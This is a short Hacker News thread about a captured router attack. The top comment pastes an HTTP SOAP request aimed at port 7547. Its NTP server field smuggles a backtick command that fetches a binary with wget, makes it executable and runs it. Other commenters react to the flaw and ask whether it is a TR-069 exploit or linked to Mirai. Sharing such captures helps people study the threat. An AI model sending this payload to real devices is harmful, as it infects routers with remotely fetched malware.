Hacker News new | past | comments | ask | show | jobs | submit login

POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocal.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>

#./2 .... busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP ...

next version step Mirai?

https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e...




What a joke. There needs to be criminal liability for this. No authentication, authorization, identification? Data passed straight to exec() and fucking backticks are executed?


What is this? A TR 069 exploit?!



Thanks.

Jeez, I hate Telekom routers. They're unstable pieces of crap (except the rare, rebranded AVM Fritzbox models). Back when I was doing freelance home IT support, these dungheap devices caused most of the problems.


It looks like one.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: